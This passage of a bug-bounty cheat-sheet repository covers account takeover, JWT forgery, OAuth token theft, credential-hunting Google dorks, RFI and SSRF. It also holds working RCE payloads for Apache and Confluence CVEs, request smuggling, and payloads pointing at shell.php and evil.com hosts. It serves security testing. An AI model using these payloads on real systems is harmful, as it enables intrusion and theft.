signing up again but using a different password 20 | ``` 21 | POST /newaccount HTTP/1.1 22 | ... 23 | email=victim@mail.com&password=hacked 24 | ``` 25 | 26 | 3. via CSRF 27 | - Create an account as an attacker, fill in the whole form, and check your info in the Account Detail. 28 | - Change the email and capture the request, then create a CSRF exploit. 29 | - The CSRF exploit looks as given below. I have replaced the email value with anyemail@*******.com and submitted a request in the victim’s account. 30 | 31 | ```html 32 | 33 | 34 |
35 | 36 | 37 |
38 | 39 | 40 | ``` 41 | 42 | 4. Chaining with IDOR, for example 43 | ``` 44 | POST /changepassword.php HTTP/1.1 45 | Host: site.com 46 | ... 47 | userid=500&password=heked123 48 | ``` 49 | 500 is the attacker's ID and 501 is the victim's ID, so we change the userid from the attacker's ID to the victim's ID 50 | 51 | 5. No Rate Limit on 2FA 52 | 53 | References: 54 | - [Pre-Account Takeover using OAuth Misconfiguration](https://vijetareigns.medium.com/pre-account-takeover-using-oauth-misconfiguration-ebd32b80f3d3) 55 | - [Account Takeover via CSRF](https://medium.com/bugbountywriteup/account-takeover-via-csrf-78add8c99526) 56 | - [How re-signing up for an account lead to account takeover](https://zseano.medium.com/how-re-signing-up-for-an-account-lead-to-account-takeover-3a63a628fd9f) -------------------------------------------------------------------------------- /CompleteBugBounty/Misc/Broken Link Hijacking.md: -------------------------------------------------------------------------------- 1 | # Broken Link Hijacking 2 | 3 | ## Introduction 4 | Broken Link Hijacking exists whenever a target links to an expired domain or page 5 | 6 | ## How to find 7 | 1. Manually find external links on the target site (for example, check links to social media accounts) 8 | 2.
Try using tools to find broken links, for example the tools listed in this readme 9 | 10 | ## Tools 11 | - [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) 12 | - [Check My Links](https://chrome.google.com/webstore/detail/check-my-links/ojkcdipcgfaekbeaelaapakgnjflfglf/related) 13 | 14 | ## References 15 | - [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/) 16 | - [How I was able to takeover the company’s LinkedIn Page](https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d) 17 | - [Hackerone #1466889](https://hackerone.com/reports/1466889) -------------------------------------------------------------------------------- /CompleteBugBounty/Misc/Default Credentials: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/CompleteBugBounty/Misc/Default Credentials -------------------------------------------------------------------------------- /CompleteBugBounty/Misc/Email Spoofing.md: -------------------------------------------------------------------------------- 1 | # Email Spoofing 2 | 3 | ## Introduction 4 | Email spoofing is a technique used in spam and phishing attacks to trick users into thinking a message came from a person or entity they either know or can trust. In spoofing attacks, the sender forges email headers so that client software displays the fraudulent sender address, which most users take at face value. 5 | 6 | ## How to detect 7 | 1. Check the SPF record; if the website doesn't have an SPF record, it is likely vulnerable to email spoofing 8 | ``` 9 | v=spf1 include:_spf.google.com ~all 10 | ``` 11 | 2.
Check the DMARC record. If the domain has no DMARC record, or the policy tag is `p=none`, mail that fails authentication is only reported (to the `rua` address), not quarantined or rejected, so spoofed messages are still delivered by most receivers; only `p=quarantine` or `p=reject` enforces anything (also check `sp=` for subdomains and `pct=`, since a partial percentage leaves the rest unenforced). Receiver behaviour varies, so confirm with a real test message to a mailbox you own rather than relying on the DNS records alone. 12 | ``` 13 | v=DMARC1; p=none; rua=mailto:dmarc@yourdomain.com 14 | ``` 15 | 16 | Reference: 17 | - [Hackerone #1071521](https://hackerone.com/reports/1071521) -------------------------------------------------------------------------------- /CompleteBugBounty/Misc/Exposed API keys.md: -------------------------------------------------------------------------------- 1 | # Exposed API Keys / Token OAuth 2 | 3 | ## Introduction 4 | Sometimes in a web application, an attacker can find exposed API keys / tokens, which can lead to financial loss or data exposure for the company. When you find one, validate it with the least-privileged, non-destructive call available (a read-only account-info or "whoami" style endpoint) and stop there: do not consume quota, create or modify resources, or read user data beyond what proves the key is live, and include the key only in the report. 5 | 6 | ## How to find 7 | 1. Find API keys / tokens by looking at the JavaScript code on the website 8 | 2. Find API keys / tokens by checking the request / response headers 9 | 10 | ## Tools 11 | * [Key-Checker](https://github.com/daffainfo/Key-Checker) 12 | 13 | # References 14 | * [keyhacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. It lists 79 ways to check the validity of API keys 15 | * [all-about-apikey](https://github.com/daffainfo/all-about-apikey) is a repository of detailed information about API keys / OAuth tokens. The repository contains a description of each API key, the HTTP request to check it, the response when the key is valid / invalid, a regex, and an example -------------------------------------------------------------------------------- /CompleteBugBounty/Misc/JWT Vulnerabilities.md: -------------------------------------------------------------------------------- 1 | # JWT Vulnerabilities 2 | 3 | ## Introduction 4 | JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. 5 | 6 | ## How to exploit 7 | 1. 
Modify the algorithm to the "none" algorithm (and drop the signature, leaving the token with an empty third segment, i.e. a trailing `.`; also try case variants such as `None`/`NONE`, which some libraries fail to reject) 8 | ``` 9 | { 10 | "alg": "none", 11 | "typ": "JWT" 12 | } 13 | ``` 14 | 2. Modify the algorithm RS256 to HS256 15 | 16 | This only works when the backend lets the token choose the algorithm instead of pinning it. If you change the algorithm from RS256 to HS256, the backend code uses the (public) RSA public key as the HMAC secret and verifies the signature with HS256 — so sign your forged token with HS256 using the exact PEM bytes of the server's public key as the secret. 17 | 18 | 3. Bruteforce HS256 19 | 20 | If the HS256 secret is weak, the signature can be brute-forced offline against a wordlist (no requests to the target are needed); default or example secrets, such as the secret string used in the PyJWT library sample code, are worth trying first. 21 | 22 | ## Tools 23 | * [jwt-hack](https://github.com/hahwul/jwt-hack) 24 | 25 | ## Reference 26 | - [Hacking JSON Web Token (JWT)](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6) -------------------------------------------------------------------------------- /CompleteBugBounty/Misc/Tabnabbing.md: -------------------------------------------------------------------------------- 1 | # Tabnabbing 2 | 3 | ## Introduction 4 | When you open a link in a new tab ( target="_blank" ) without `rel="noopener"`, the page that opens in the new tab can reach the original tab and change its location via the window.opener property. Note that current browsers treat `target="_blank"` as implying `noopener` by default, so this is usually low impact and often out of scope; confirm the anchor really lacks `rel="noopener"`/`rel="noreferrer"` and demonstrate the redirect in a browser the program considers in scope. 5 | 6 | ## How to find 7 | ```html 8 | 9 | 10 | 11 | ``` 12 | 13 | ## How to Exploit 14 | 1. Attacker posts a link to a website under his control that contains the following JS code: 15 | ```html 16 | 17 | 21 | 22 | ``` 23 | 2. He tricks the victim into visiting the link, which is opened in the browser in a new tab. 24 | 3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website. 
25 | 26 | ## References 27 | * [Hackerone #260278](https://hackerone.com/reports/260278) -------------------------------------------------------------------------------- /CompleteBugBounty/OAuth Misconfiguration.md: -------------------------------------------------------------------------------- 1 | # OAuth Misconfiguration 2 | 3 | ## Introduction 4 | The most infamous OAuth-based vulnerability is when the configuration of the OAuth service itself enables attackers to steal authorization codes or access tokens associated with other users’ accounts. By stealing a valid code or token, the attacker may be able to access the victim's account. 5 | 6 | ## Where to find 7 | In the SSO feature. For example `Log in with google` or `Log in with facebook`. 8 | 9 | ## How to exploit 10 | 1. OAuth token stealing: Changing redirect_uri to attacker.com (use IDN homographs or common bypasses); if the authorization server accepts it, the code or token is delivered to a host you control. 11 | 2. Change the Referer header to attacker.com while requesting OAuth. 12 | 3. Create an account with victim@gmail.com with normal functionality. Create account with victim@gmail.com using OAuth functionality. Now try to login using previous credentials. 13 | 4. OAuth Token Re-use. 14 | 5. Missing or broken state parameter (the callback is then CSRF-able: the victim can be made to complete the flow with the attacker's code, linking the attacker's provider account to the victim's session). 15 | 6. Lack of origin check. 16 | 7. Open Redirection on another endpoint > Use it in redirect_uri 17 | 8. If there is an email parameter after signin then try to change the email parameter to victim's one. 18 | 9. Try to remove email from the scope and add victim's email manually. 19 | 10. Only company's email is allowed? > Try to replace hd=company.com to hd=gmail.com (the `hd` parameter is a Google-specific hint and must be enforced server-side on the returned ID token, not trusted from the request) 20 | 11. Check if it's leaking the client_secret parameter. 21 | 12. Go to the browser history and check if the token is there (tokens returned in the URL, e.g. implicit-flow fragments, also leak through history and Referer). 
22 | 23 | ## References 24 | * [tuhin1729_](https://twitter.com/tuhin1729_/status/1417843523177484292) 25 | * [c0d3x27](https://infosecwriteups.com/the-oauth-misconfiguration-15e66dd19a6e) -------------------------------------------------------------------------------- /CompleteBugBounty/Reconnaissance/Google Dorks.md: -------------------------------------------------------------------------------- 1 | # Google Dorks 2 | ## List 3 | - inurl:example.com intitle:"index of" 4 | - inurl:example.com intitle:"index of /" "*key.pem" 5 | - inurl:example.com ext:log 6 | - inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv 7 | - inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git 8 | - inurl:example.com intitle:"index of" "config.db" 9 | - inurl:example.com allintext:"API_SECRET*" ext:env | ext:yml 10 | - inurl:example.com intext:admin ext:sql inurl:admin 11 | - inurl:example.com allintext:username,password filetype:log 12 | - site:example.com "-----BEGIN RSA PRIVATE KEY-----" - inurl:id_rsa 13 | - site:codepad.co "keyword" 14 | - site:scribd.com "keyword" 15 | - site:npmjs.com "keyword" 16 | - site:npm-runkit.com "keyword" 17 | - site:libraries.io "keyword" 18 | - site:ycombinator.io "keyword" 19 | - site:coggle.it "keyword" 20 | - site:papaly.com "keyword" 21 | - site:google.com "keyword" 22 | - site:trello.com "keyword" 23 | - site:prezi.com "keyword" 24 | - site:jsdelivr.net "keyword" 25 | - site:codepen.io "keyword" 26 | - site:codeshare.io "keyword" 27 | - site:sharecode.io "keyword" 28 | - site:pastebin.com "keyword" 29 | - site:repl.it "keyword" 30 | - site:productforums.google.com "keyword" 31 | - site:gitter.im "keyword" 32 | - site:bitbucket.org "keyword" 33 | - site:*atlassian.net "keyword" 34 | - inurl:gitlab "keyword" 35 | - inurl:github "keyword" -------------------------------------------------------------------------------- /CompleteBugBounty/Remote File Inclusion.md: 
-------------------------------------------------------------------------------- 1 | ## Remote File Inclusion (RFI) 2 | 3 | ## Introduction 4 | Remote file inclusion (RFI) is an attack targeting vulnerabilities in web applications that dynamically include files based on user input. In PHP, a remote URL is only fetched and included when `allow_url_include` is enabled — it is off by default — so a user-controlled include on a modern target is usually exploitable only as LFI; test the remote payloads below, but fall back to the LFI techniques if they fail. 5 | 6 | ## Where to find 7 | - Any endpoint that includes a file from a web server. For example, `/index.php?page=index.html` 8 | 9 | ## How to exploit 10 | Host the included file on a server you control and keep it harmless (e.g. a page that prints a unique marker) rather than a web shell, unless the program explicitly permits it. 11 | 1. Basic payload 12 | ``` 13 | http://example.com/index.php?page=http://daffa.info/shell.php 14 | ``` 15 | 16 | 2. URL encoding 17 | ``` 18 | http://example.com/index.php?page=http%3A%2F%2Fdaffa.info%2Fshell.php 19 | ``` 20 | 21 | 3. Double encoding (only useful when the parameter is URL-decoded twice) 22 | ``` 23 | http://example.com/index.php?page=http%253A%252F%252Fdaffa.info%252Fshell.php 24 | ``` 25 | 26 | 4. Using Null Byte (%00) — truncates an appended suffix such as `.php`, but only on old PHP versions where null bytes are still honoured in file paths 27 | ``` 28 | http://example.com/index.php?page=http://daffa.info/shell.php%00 29 | ``` 30 | 31 | ## References 32 | * [payloadbox](https://github.com/payloadbox/rfi-lfi-payload-list) -------------------------------------------------------------------------------- /CompleteBugBounty/SQL Injection.md: -------------------------------------------------------------------------------- 1 | # Soon! 
-------------------------------------------------------------------------------- /CompleteBugBounty/Server Side Request Forgery.md: -------------------------------------------------------------------------------- 1 | # Server Side Request Forgery (SSRF) 2 | 3 | ## Introduction 4 | Server Side Request Forgery is a web application vulnerability that allows attackers to make outgoing requests originating from the vulnerable server 5 | 6 | ## Where to find 7 | Usually it can be found in the request that contain request to another url, for example like this 8 | ``` 9 | POST /api/check/products HTTP/1.1 10 | Host: example.com 11 | Content-Type: application/x-www-form-urlencoded 12 | Origin: https://example.com 13 | Referer: https://example.com 14 | 15 | urlApi=http://192.168.1.1%2fapi%2f&id=1 16 | ``` 17 | 18 | or 19 | 20 | ``` 21 | GET /image?url=http://192.168.1.1/ 22 | Host: example.com 23 | ``` 24 | 25 | ## How to exploit 26 | 1. Basic payload 27 | ``` 28 | http://127.0.0.1:1337 29 | http://localhost:1337 30 | ``` 31 | 32 | 2. Hex encoding 33 | ``` 34 | http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1 35 | ``` 36 | 37 | 3. Octal encoding 38 | ``` 39 | http://127.0.0.1 -> http://0177.0.0.01 40 | ``` 41 | 42 | 4. Dword encoding 43 | ``` 44 | http://127.0.0.1 -> http://2130706433 45 | ``` 46 | 47 | 5. Mixed encoding 48 | ``` 49 | http://127.0.0.1 -> http://0177.0.0.0x1 50 | ``` 51 | 52 | 6. Using URL encoding 53 | ``` 54 | http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74 55 | ``` 56 | 57 | 7. Using IPv6 58 | ``` 59 | http://0000::1:1337/ 60 | http://[::]:1337/ 61 | ``` 62 | 63 | 8. Using bubble text 64 | ``` 65 | http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ 66 | 67 | Use this https://capitalizemytitle.com/bubble-text-generator/ 68 | ``` 69 | 70 | ## How to exploit (URI Scheme) 71 | 1. File scheme 72 | ``` 73 | file:///etc/passwd 74 | ``` 75 | 76 | 2. Dict scheme 77 | ``` 78 | dict://127.0.0.1:1337/ 79 | ``` 80 | 81 | 3. FTP scheme 82 | ``` 83 | ftp://127.0.0.1/ 84 | ``` 85 | 86 | 4. 
TFTP scheme 87 | ``` 88 | tftp://evil.com:1337/test 89 | ``` 90 | 91 | 5. SFTP scheme 92 | ``` 93 | sftp://evil.com:1337/test 94 | ``` 95 | 96 | 6. LDAP scheme 97 | ``` 98 | ldap://127.0.0.1:1337/ 99 | ``` 100 | 101 | 7. Gopher scheme 102 | ``` 103 | gopher://evil.com/_Test%0ASSRF 104 | ``` 105 | ## References 106 | * [Vickie Li](https://vickieli.medium.com/bypassing-ssrf-protection-e111ae70727b) -------------------------------------------------------------------------------- /CompleteBugBounty/Technologies/Apache HTTP Server.md: -------------------------------------------------------------------------------- 1 | # Apache (HTTP Server) Common Bugs 2 | 3 | ## Introduction 4 | What would you do if you came across a website that uses Apache (HTTP Server)? 5 | 6 | ## How to Detect 7 | Usually in the HTTP response there is a header like this `Server: Apache` or `Server: Apache/2.4.50` and check the 404 page 8 | 9 | 1. Find the related CVE by checking Apache (HTTP Server) version 10 | * How to find the Apache (HTTP Server) version 11 | 12 | By checking the response header or using 404 page, sometimes the version is printed there. 
If you found an outdated Apache (HTTP Server) version, find the CVEs at [CVE Details](https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/Apache-Http-Server.html) 13 | 14 | Some example CVE: 15 | 16 | - CVE-2021-41773 (RCE and LFI) — path traversal in 2.4.49; the RCE form below needs `mod_cgi` enabled, otherwise the same traversal may still read files if the default `Require all denied` on the filesystem root was relaxed. Use only harmless commands such as `id` to demonstrate. 17 | ``` 18 | POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1 19 | Host: 127.0.0.1:8080 20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 21 | Accept: */* 22 | Content-Length: 7 23 | Content-Type: application/x-www-form-urlencoded 24 | Connection: close 25 | 26 | echo;id 27 | ``` 28 | - CVE-2021-42013 (RCE and LFI) — bypass of the incomplete 2.4.50 fix using double URL encoding; affects 2.4.49 and 2.4.50 under the same preconditions 29 | ``` 30 | POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1 31 | Host: 127.0.0.1:8080 32 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 33 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 34 | Accept-Language: en-US,en;q=0.5 35 | Accept-Encoding: gzip, deflate 36 | Connection: close 37 | Upgrade-Insecure-Requests: 1 38 | Content-Type: application/x-www-form-urlencoded 39 | Content-Length: 7 40 | 41 | echo;id 42 | ``` -------------------------------------------------------------------------------- /CompleteBugBounty/Technologies/Confluence.md: -------------------------------------------------------------------------------- 1 | # Confluence Common Bugs 2 | 3 | ## Introduction 4 | What would you do if you came across a website that uses Confluence? 5 | 6 | ## How to Detect 7 | Try to HTTP request to `https://example.com/login.action?os_destination=%2F` and there is a form login 8 | 9 | 1. Find the related CVE by checking Confluence version 10 | * How to find the Confluence version 11 | 12 | Try to request to `https://example.com/login.action?os_destination=%2F` and then check the source code. You will find this line `` so 8.20.9 is the Confluence version. 
If you found an outdated Confluence version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-6258/Atlassian-Confluence.html) 13 | 14 | Some example CVE: 15 | 16 | - CVE-2022-26134 (Remote Code Execution) — unauthenticated OGNL injection in the URL path; the payload below runs `whoami` and returns its output in the `X-Cmd-Response` response header, so check the headers rather than the body. Keep the command harmless. 17 | ``` 18 | https://example.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ 19 | ``` 20 | 21 | - CVE-2021-26085 (Arbitrary File Read) 22 | ``` 23 | https://example.com/s/test/_/;/WEB-INF/web.xml 24 | ``` -------------------------------------------------------------------------------- /CompleteBugBounty/Technologies/HAProxy.md: -------------------------------------------------------------------------------- 1 | # HAProxy Common Bugs 2 | 3 | ## Introduction 4 | What would you do if you came across a website that uses HAProxy? 5 | 6 | ## How to Detect 7 | `-` 8 | 9 | 1. 
CVE-2021-40346 (HTTP Request Smuggling) — an integer overflow in header-name length handling lets the oversized `Content-Length0aaa...` header name hide a second `Content-Length`, so the body is parsed as a separate request by the backend; this is how a path the frontend ACLs would block (here `/admin/add_user.py`) is reached. Only HAProxy builds before the fixed 2.x point releases listed in the JFrog writeup are affected, and the target can only be confirmed vulnerable by observing the smuggled request being served. 10 | ``` 11 | POST /index.html HTTP/1.1 12 | Host: abc.com 13 | Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: 14 | Content-Length: 60 15 | 16 | GET /admin/add_user.py HTTP/1.1 17 | Host: abc.com 18 | abc: xyz 19 | ``` 20 | 21 | Source: 22 | - [JFrog](https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/) -------------------------------------------------------------------------------- /CompleteBugBounty/Technologies/Joomla.md: -------------------------------------------------------------------------------- 1 | # Joomla Common Bugs 2 | 3 | ## Introduction 4 | What would you do if you came across a website that uses Joomla ? 5 | 6 | ## How to Detect 7 | Try to HTTP request to `https://example.com/` and if you see the source code, you will see something like this `` 8 | 9 | 1. Find the related CVE by checking the core, plugins, and theme version 10 | * How to find the joomla version 11 | ``` 12 | https://target.com/administrator/manifests/files/joomla.xml 13 | ``` 14 | 15 | * How to find the joomla plugin version 16 | ``` 17 | https://target.com/administrator/components/com_NAMEPLUGIN/NAMEPLUGIN.xml 18 | 19 | for example 20 | 21 | https://target.com/administrator/components/com_contact/contact.xml 22 | ``` 23 | 24 | > or change NAMEPLUGIN.xml to `changelog.txt` or `readme.md` or `readme.txt` 25 | 26 | * How to find the template (theme) version 27 | ``` 28 | https://target.com/templates/THEMENAME/templateDetails.xml 29 | https://target.com/templates/THEMENAME/README.txt (If they have a readme file) 30 | ``` 31 | (Joomla templates live under `/templates/`, as in the joomla_themes wordlist in this repo; `wp-content/themes/` is a WordPress path and will not exist on a Joomla site.) If you found outdated core / plugins, find the exploit at https://exploit-db.com 32 | 33 | 2. Joomla! 
Config Dist File 34 | ``` 35 | https://example.com/configuration.php-dist 36 | ``` 37 | 3. Database File List 38 | ``` 39 | https://example.com/libraries/joomla/database/ 40 | ``` 41 | 42 | ## References 43 | - [Exploit-db #6377](https://www.exploit-db.com/ghdb/6377) -------------------------------------------------------------------------------- /CompleteBugBounty/Technologies/Laravel.md: -------------------------------------------------------------------------------- 1 | # Laravel Common Bugs 2 | 3 | ## Introduction 4 | What would you do if you came across a website that uses Laravel? 5 | 6 | ## How to Detect 7 | Usually in the HTTP response there is a header like this `Set-Cookie: laravel_session=` 8 | 9 | 1. Find the related CVE by checking laravel version 10 | * How to find the laravel version 11 | 12 | By checking the composer file in `https://example.com/composer.json`, sometimes the version is printed there. If you found an outdated laravel version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-16542/product_id-38139/Laravel-Laravel.html) 13 | 14 | Some example CVE: 15 | 16 | - CVE-2021-3129 (Remote Code Execution) — requires debug mode to be enabled and a vulnerable `facade/ignition` version (before 2.5.2). The request below is only one step of the exploit: it abuses `php://filter` to rewrite `storage/logs/laravel.log`, and full RCE needs the additional log-poisoning/deserialization steps described in the public write-ups. A `200` on this request with the log file being altered is enough to demonstrate the issue; stop there. 17 | ``` 18 | POST /_ignition/execute-solution HTTP/1.1 19 | Host: example.com 20 | Accept: application/json 21 | Content-Type: application/json 22 | 23 | {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} 24 | ``` 25 | 26 | 2. PHPUnit `eval-stdin.php` Remote Code Execution (CVE-2017-9841) — the version range (4.8.28 ~ 5.x) is PHPUnit's, not Laravel's: it hits any PHP app that deployed its `vendor/` directory with a vulnerable PHPUnit to the web root. The script evaluates the POST body as PHP; the empty-body `curl` below only shows the file is reachable, so prove execution with a harmless expression rather than a shell. 27 | ``` 28 | curl -d "" http://example.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 29 | ``` 30 | 31 | 3. 
Exposed environment variables — a readable `.env` typically contains `APP_KEY`, database and mail credentials; report it without using the credentials 32 | * Full Path Exploit : http://example.com/.env 33 | 34 | ![Environment Variables](https://1.bp.blogspot.com/-EUTxgP5XE6Q/XkgB4SyWSbI/AAAAAAAAAQA/eqtALOjLKKA46si-lIosm6cDVmxByjzIQCLcBGAsYHQ/s1600/1.png) 35 | 36 | 4. Exposed log files (stack traces in the log can include request data, paths and sometimes secrets) 37 | * Full Path Exploit : http://example.com/storage/logs/laravel.log 38 | 39 | 5. Laravel Debug Mode Enabled (the debug page leaks file paths, environment variables and request/SQL details, and is a precondition for CVE-2021-3129 above) 40 | * Try to request to https://example.com using POST method (Error 405) 41 | * Using [] in a parameter (ex: example.com/param[]=0) 42 | 43 | ![Laravel Debug Mode](https://hacken.io/wp-content/uploads/2019/07/laravel-screen.png) 44 | 45 | ## References 46 | * [Nakanosec](https://www.nakanosec.com/2020/02/common-bug-pada-laravel.html) 47 | -------------------------------------------------------------------------------- /CompleteBugBounty/Technologies/Moodle.md: -------------------------------------------------------------------------------- 1 | # Moodle Common Bugs 2 | 3 | ## Introduction 4 | What would you do if you came across a website that uses Moodle? 5 | 6 | ## How to Detect 7 | If you visit `https://target.com` and see the source code, you will see `//evil.com 45 | https://example.com/\/\/evil.com/ 46 | https://example.com/\/evil.com 47 | https://example.com/\evil.com 48 | https://example.com/evil.com 49 | https://example.com/evil.com/%2F.. 50 | https://example.com/evil.com/ 51 | https://example.com/evil.com/..;/css 52 | https://example.com/https:evil.com 53 | ``` 54 | 55 | 4. Nginx status page (`stub_status` output exposes connection counts only, but confirms the module is exposed unauthenticated) 56 | ``` 57 | https://example.com/nginx_status 58 | ``` 59 | 60 | ## References 61 | - [Detectify](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/) -------------------------------------------------------------------------------- /CompleteBugBounty/Technologies/Zend.md: -------------------------------------------------------------------------------- 1 | # Zend Common Bugs 2 | 3 | ## Introduction 4 | What would you do if you came across a website that uses Zend? 
5 | 6 | ## How to Detect 7 | `-` 8 | 9 | 1. Finding config files 10 | ``` 11 | https://target.com/application/configs/application.ini 12 | https://target.com/admin/configs/application.ini 13 | ``` -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Paul Veillard, P. Eng 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Web Application Security Labs 2 | 3 | An ongoing & curated collection of awesome software best practices and techniques, libraries and frameworks, E-books and videos, websites, blog posts, links to github Repositories, technical guidelines and important resources about Web Application Security Labs in Cybersecurity. 4 | > Thanks to all contributors, you're awesome and wouldn't be possible without you! Our goal is to build a categorized community-driven collection of very well-known resources 5 | 6 | 7 | 8 | https://portswigger.net/web-security/all-labs 9 | -------------------------------------------------------------------------------- /cross-site-request-forgery/xss-payload-list/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 İsmail Taşdelen 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /cross-site-scripting/xss-payload-list/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 İsmail Taşdelen 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
